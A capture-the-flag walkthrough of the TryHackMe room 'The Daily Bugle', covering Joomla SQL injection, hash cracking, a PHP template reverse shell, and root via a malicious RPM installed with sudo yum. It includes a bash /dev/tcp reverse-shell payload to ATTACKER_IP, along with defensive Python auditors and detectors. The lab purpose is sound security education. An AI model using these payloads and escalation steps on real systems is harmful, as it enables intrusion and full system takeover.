Try Hack Me Walkthrough: The Daily Bugle

D3u5Vu1t
6 min read · Jun 25, 2021

I enjoy doing CTFs and I think everyone should try them: they allow us to hone our skills while having a little fun at the same time. This walkthrough is for the Try Hack Me room The Daily Bugle, which can be found here.

Early disclaimer: all information that could lead to a quick win has been redacted. Enjoy!

Enumeration

For CTFs my first stop will always be nmap; this is your best friend when starting out. nmap is a network scanner that will give us information on the ports that are available. I use this command:

nmap -sV ipaddr

Where ipaddr is replaced with the target machine's IP address. The output should look like this:

Here we have ports 22, 80 and 3306 open. Port 22 is SSH, a command-line based remote connection tool. Port 80 is HTTP, which means the host is running a web server. Finally, 3306 is MySQL, which means a database is being hosted. Our next step is to check out the web page and see what we can find out about this server.

You can use tools like dirb or gobuster to brute-force web directories, but in this instance I simply tried to see if an administrator page existed, and I was lucky enough to find that it did. This is something to make a note of. It does not hurt to poke around the web page for a little while to see if anything is hidden, but I didn't find anything. Thankfully for us, a tool called joomblah exists which is made to enumerate Joomla sites!

Joomblah.py can be found here. What joomblah.py did was exploit a SQL injection and dump a table. The table we received contained a user and their password hash. Our next step is to try and crack this hash!

In order to do this we need to copy the hash to a text file and use a tool called hashcat. I used the following command:

hashcat -m 3200 hash.txt -a 0 /usr/share/wordlists/rockyou.txt

Remember, it is okay not to know every switch off the top of your head; that would make you a walking CEH exam. When you need help, almost every tool supports /h, --help or -h, which will return a list of switches for your command/tool. To break it down a little, -m lets us specify what type of hash we are cracking. The -a flag lets us choose an attack mode, or in other words how many resources will be used on this task.

rockyou.txt is zipped by default in Kali Linux, so you might have to unzip it first. The hash can be cracked using rockyou.txt pretty fast. The password we just recovered, together with the information we already have, allows us to log in to the admin page.
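A quick look at why `-m 3200` is the right mode here, and what a defender should take from it. The example below is added to this walkthrough and is not from the original post or from joomblah; it parses the two layouts a dumped Joomla users table can contain (modern bcrypt, and the legacy `md5hash:salt` format that hashcat handles as mode 11) and flags storage that an offline cracker gets through cheaply. Both sample hashes are constructed filler of the correct length, and the minimum bcrypt cost of 10 is an assumption, not a Joomla default.

```python
import re

# Constructed sample of what a dumped Joomla users table might hold (not real credentials).
# The bcrypt entry uses filler characters of the right length; the second entry is the
# legacy Joomla "md5hash:salt" layout that older versions stored.
SAMPLE_HASHES = {
    "admin": "$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234",
    "editor": "d41d8cd98f00b204e9800998ecf8427e:01234567890123456789012345678901",
}

# bcrypt modular-crypt format: $2y$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$[./A-Za-z0-9]{53}$")
# Legacy Joomla: 32 hex chars of md5(password + salt), a colon, then the salt
LEGACY_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{16,32}$")

MIN_BCRYPT_COST = 10  # assumption: treat a work factor below this as too cheap for current hardware


def classify_hash(value):
    """Return (scheme, hashcat_mode, cost) for a stored hash, or None if unrecognised.

    hashcat mode 3200 is bcrypt (the mode used in the walkthrough); mode 11 is the
    legacy "Joomla < 2.5.18" salted-MD5 format.
    """
    m = BCRYPT_RE.match(value)
    if m:
        return ("bcrypt", 3200, int(m.group(2)))
    if LEGACY_RE.match(value):
        return ("joomla-md5-salt", 11, None)
    return None


def audit_hashes(dump):
    """Flag entries an offline cracker could get through quickly.

    Each finding records the scheme, the hashcat mode a cracker would use, and
    whether the storage is weak (legacy MD5, unknown format, or a low bcrypt cost).
    """
    findings = []
    for user, value in dump.items():
        info = classify_hash(value)
        if info is None:
            findings.append({"user": user, "scheme": "unknown", "hashcat_mode": None,
                             "weak": True, "note": "unrecognised hash format; verify storage"})
            continue
        scheme, mode, cost = info
        if scheme == "bcrypt":
            weak = cost < MIN_BCRYPT_COST
            note = f"bcrypt cost {cost}: 2^{cost} = {2 ** cost} rounds per guess"
        else:
            weak = True
            note = "legacy salted MD5: one fast hash per guess; rehash with bcrypt on next login"
        findings.append({"user": user, "scheme": scheme, "hashcat_mode": mode,
                         "weak": weak, "note": note})
    return findings


if __name__ == "__main__":
    for f in audit_hashes(SAMPLE_HASHES):
        print(f"{f['user']:<8} {f['scheme']:<16} weak={f['weak']}  {f['note']}")
```

The takeaway for the blue side: bcrypt's cost only multiplies the price of each guess, so a password that sits in rockyou.txt still falls within minutes at any cost factor. The hash format buys time; the admin's password choice decides whether that time is enough.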

Once in the admin page you can go to a template and embed a PHP reverse shell into it; one can be found here. In the reverse shell you have to change the IP address and listening port to your own. Once you have done that you can start a listener with netcat:

nc -lvp port

Now that the listener is active we can call the modified template and get a reverse shell! This is our foothold!

The shell we have runs as /var/www, the service account for the web service. This does not mean it is useless, but it does mean we will have limited access. After looking around the directory for a while I found an interesting file called configuration.php.

There are two passwords in it! This is great, but after trying to log in via SSH, the password is not for our user Jonah and it is not for root. This means there might be another user it works for. We can find all users by looking at the /etc/passwd file. This can be done with the following command:

cat /etc/passwd

Here we find that Jonah's username is jjameson. From here you can do one of two things: 1. log in through SSH, or 2. use the su command to switch user to jjameson.
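Reading /etc/passwd by eye works on a box with six accounts; on a real host it is worth doing the same thing with a few lines of code, which is also how an administrator audits the file. The script below is an added example, not part of the original walkthrough: it parses passwd(5) lines, maps a person's name in the GECOS field to their login name (the step above), and then lists which accounts can actually log in, including any service account that still has a shell. The file contents are constructed to resemble a CentOS web host and are not a dump from the room.

```python
# Constructed /etc/passwd excerpt modelled on a CentOS web host (not a dump from the room).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/sh
jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash
"""

# Shells that refuse an interactive login
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; blank, comment and malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def find_by_gecos(users, fragment):
    """Map a person's name (GECOS field) to login names, case-insensitively."""
    frag = fragment.lower()
    return [u["name"] for u in users if frag in u["gecos"].lower()]


def interactive_accounts(users):
    """Accounts that can log in: root, or a regular (UID >= 1000) user with a real shell."""
    return [u["name"] for u in users
            if u["shell"] not in NOLOGIN_SHELLS and (u["uid"] == 0 or u["uid"] >= 1000)]


def service_accounts_with_shell(users):
    """Hardening finding: service accounts (0 < UID < 1000) that still own a login shell."""
    return [u["name"] for u in users
            if 0 < u["uid"] < 1000 and u["shell"] not in NOLOGIN_SHELLS]


if __name__ == "__main__":
    users = parse_passwd(SAMPLE_PASSWD)
    print("login name for 'Jonah':", find_by_gecos(users, "jonah"))
    print("interactive accounts:", interactive_accounts(users))
    print("service accounts with a shell:", service_accounts_with_shell(users))
```

The web server's account is the one to watch here: with /sbin/nologin as its shell, a password found in configuration.php is only useful if it belongs to an account that can log in, which is exactly why the file is worth cross-checking against /etc/passwd from either side of the fence.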

Now that we have a user shell you can grab user.txt!

Privilege Escalation

Now that we have a user shell we need to get root privileges on this machine. I looked around for some sort of file that might give away the secret but I couldn't find one. Next I used the command:

sudo -l

This command lists the sudo permissions of our user (if there are any).

It returns that we have sudo privileges for /usr/bin/yum. This is where everything gets a little tricky, but I can get you through it. There is a website called GTFOBins (link) that lets you search for any of these sudo privileges and learn how to leverage them for a root shell. GTFOBins tells us that we can use an RPM package with a reverse shell script to get the shell.
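The rule that makes this room solvable is one line in sudoers, and it is the kind of line that looks harmless in review ("they can only run yum"). The following is an added example, not from the walkthrough or from GTFOBins: a small sudoers audit that parses user-specification lines and flags grants on programs GTFOBins documents as able to reach a root shell, shown against a weak configuration that mirrors the room and a corrected one. The sudoers excerpts are constructed, the list of escape-capable binaries is an illustrative subset, and the wrapper path /usr/local/sbin/apply-updates in the corrected version is an assumption.

```python
import re

# Constructed sudoers excerpts (not copied from the room). The weak rule mirrors the
# walkthrough's finding: one user may run the package manager as root without a password.
WEAK_SUDOERS = """\
Defaults    requiretty
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
"""

# Corrected version: the open-ended package-manager grant is replaced by a root-owned,
# non-writable wrapper (assumed path) that runs one fixed command, so the user can no
# longer choose which package, or which install script, runs as root.
FIXED_SUDOERS = """\
Defaults    requiretty
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(root)      /usr/local/sbin/apply-updates
"""

# Illustrative subset of programs GTFOBins lists as able to reach a root shell or write
# arbitrary files when allowed through sudo. Extend it from the GTFOBins sudo list.
SHELL_ESCAPE_BINS = {"yum", "dnf", "rpm", "apt", "apt-get", "vim", "vi", "find",
                     "less", "more", "python", "python3", "perl", "env", "bash", "sh"}

# user  host=(runas)  [TAG: ...]  command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user-specification lines; Defaults, alias definitions and comments are ignored."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"[A-Z]+", m.group("tags")))
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"who": m.group("who"), "runas": m.group("runas"),
                      "tags": tags, "cmds": cmds})
    return rules


def audit_rules(rules):
    """Return (who, command, reason) for grants that hand out more than they appear to."""
    findings = []
    for r in rules:
        if r["who"] == "root":
            continue
        for cmd in r["cmds"]:
            base = cmd.split()[0].rsplit("/", 1)[-1]
            if base in SHELL_ESCAPE_BINS:
                findings.append((r["who"], cmd,
                                 "program can be driven to a root shell; use a fixed-argument wrapper"))
            elif cmd == "ALL" and "NOPASSWD" in r["tags"]:
                findings.append((r["who"], cmd, "unrestricted root without a password"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_SUDOERS), ("fixed", FIXED_SUDOERS)):
        print(label, audit_rules(parse_sudoers(text)))
```

The fix is not a tighter argument list for yum (sudoers argument matching is easy to get wrong) but removing the package manager from the grant entirely. The wrapper must be owned by root and not writable by the user, otherwise the rule has simply moved the problem one file over.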

Kali does not (natively) support the ability to build an RPM package. You can use https://github.com/jordansissel/fpm to build it.

git clone https://github.com/jordansissel/fpm

cd fpm/

gem install fpm

apt-get install rpm

Now we have the tool installed and set up. Next we need to create a payload. A simple bash script will suffice:

#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/LISTENING_PORT 0>&1

We need to create a .sh file and put this in it. After that you have to build the RPM package:

fpm -n root -s dir -t rpm -a all --before-install /tmp/rpmdemo/root.sh /tmp/rpmdemo

fpm -h will, again, give you a help menu to help you use the tool to its fullest. Once this is done, you need to host a local web server so we can transfer the file to the target machine. The easiest way to do this is to navigate to the directory containing the rpm file and use python:

python -m SimpleHTTPServer 80

or

python -m http.server 80

You can also use Apache if you want, but I found this easier. Then, on the target, use:

wget http://AttackerIP/Filename.rpm

After this you can install the package and it will run the script, giving us a reverse shell. (Don't forget to start your listener on your host machine.)

sudo yum localinstall -y filename.rpm
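Every step of this escalation leaves a record: sudo writes each command it runs to /var/log/secure (or auth.log), including the full yum command line and the working directory. The detector below is an added example, not part of the original walkthrough; it parses sudo's standard syslog line format and alerts on any yum or dnf install of a .rpm file that did not come out of the package cache, which is the signature of a locally built package like the one above. The log lines are constructed (the hostname, timestamps and package file name are made up), and treating only /var/cache/yum and /var/cache/dnf as sanctioned sources is an assumption you would adjust for your own repositories.

```python
import re
import shlex

# Constructed /var/log/secure excerpt in sudo's standard syslog format (not from the room).
# Line 2 is the pattern this walkthrough relies on: a locally built package installed from /tmp.
SAMPLE_SECURE_LOG = """\
Jun 25 12:00:01 bugle sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND=/usr/bin/yum update -y
Jun 25 12:03:14 bugle sudo: jjameson : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/yum localinstall -y /tmp/root-1.0-1.noarch.rpm
Jun 25 12:05:40 bugle sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/yum install -y /var/cache/yum/x86_64/7/base/packages/htop-2.2.0-3.el7.x86_64.rpm
Jun 25 12:06:10 bugle su: pam_unix(su-l:session): session opened for user jjameson by (uid=48)
"""

SUDO_RE = re.compile(r"\bsudo:\s+(?P<user>\S+)\s+:\s+(?P<kv>.*)$")

# Assumption: a package is only sanctioned when it comes out of the yum/dnf cache,
# i.e. it was fetched (and GPG-checked) from a configured repository.
TRUSTED_RPM_DIRS = ("/var/cache/yum/", "/var/cache/dnf/")
INSTALL_SUBCMDS = {"localinstall", "install", "localupdate", "update", "upgrade",
                   "reinstall", "downgrade"}


def parse_sudo_line(line):
    """Turn one sudo syslog line into {'user', 'TTY', 'PWD', 'USER', 'COMMAND'}; None if not sudo."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    event = {"user": m.group("user")}
    for part in m.group("kv").split(" ; "):
        key, sep, value = part.partition("=")
        if sep:
            event[key.strip()] = value.strip()
    return event


def rpm_files_installed(command):
    """Return the .rpm paths a yum/dnf command would install, or [] if it is not an install."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return []
    if not argv or argv[0].rsplit("/", 1)[-1] not in ("yum", "dnf"):
        return []
    subcmd = next((a for a in argv[1:] if not a.startswith("-")), None)
    if subcmd not in INSTALL_SUBCMDS:
        return []
    return [a for a in argv[1:] if a.endswith(".rpm")]


def detect_untrusted_rpm_installs(log_text):
    """Alert on sudo-run yum/dnf installs of .rpm files that did not come from the package cache."""
    alerts = []
    for line in log_text.splitlines():
        event = parse_sudo_line(line)
        if not event or "COMMAND" not in event:
            continue
        for pkg in rpm_files_installed(event["COMMAND"]):
            if not pkg.startswith(TRUSTED_RPM_DIRS):
                alerts.append({"user": event["user"], "pwd": event.get("PWD"),
                               "package": pkg, "command": event["COMMAND"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_untrusted_rpm_installs(SAMPLE_SECURE_LOG):
        print(f"ALERT {alert['user']} installed {alert['package']} from PWD={alert['pwd']}")
```

Package installs from /tmp or a home directory by a non-administrator are rare enough on a server that this rule can page someone. The before-install script runs before the package is even unpacked, so the sudo line is the earliest signal you get; the reverse connection itself only shows up in network telemetry afterwards.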

BOOM! Your listener should have picked it up, and that means…

ROOT!

I wanted to put a note here at the bottom that you aren't required to know everything; this is a learning experience, or a way to test the mettle of the more hardened hackers. I did not know how to create an RPM file and I had to look up a guide (linked below). The internet is your tool, use it! Use all the tools at your disposal to reach your goals!

Thanks for joining me on this journey. I had a blast and I learned something new! I hope you share my sentiments. Happy hacking!
